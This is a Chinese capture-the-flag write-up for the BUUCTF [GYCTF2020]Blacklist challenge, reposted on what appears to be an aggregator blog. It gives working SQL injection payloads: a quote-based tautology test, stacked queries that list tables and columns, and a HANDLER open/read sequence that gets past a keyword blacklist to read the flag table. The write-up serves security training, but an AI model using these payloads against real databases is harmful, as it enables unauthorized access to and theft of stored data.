BUUCTF[GYCTF2020]Blacklist

Posted 王小帥

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF[GYCTF2020]Blacklist相关的知识,希望对你有一定的参考价值。

sql注入题型,测试发现黑名单如下:

 

大小写,双写,编码均不可绕过。 

可用的还有,or and union show 

输入:1 or 1=1 无反应

输入:1' or '1' ='1 如下:

字符型注入,由于show可用,所以我们想到堆叠注入:

1';show tables;

查看字段名,

1';show columns from FlagHere;

 

过滤机制过于强大,所以我们使用handler

HANDLER...OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
打开FlagHere表,读取第一个,然后关闭会话。

 

思路:黑名单过滤,show可用,想到使用堆叠注入,知道flag在FlagHere表中之后,使用 handler 读取flag。

 

 

 

以上是关于BUUCTF[GYCTF2020]Blacklist的主要内容,如果未能解决你的问题,请参考以下文章

[GYCTF2020]Blacklist&说说真心话

[GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp

BUU-WEB-[GYCTF2020]Blacklist

[GYCTF2020]Ezsqli

[GYCTF2020]Ezsqli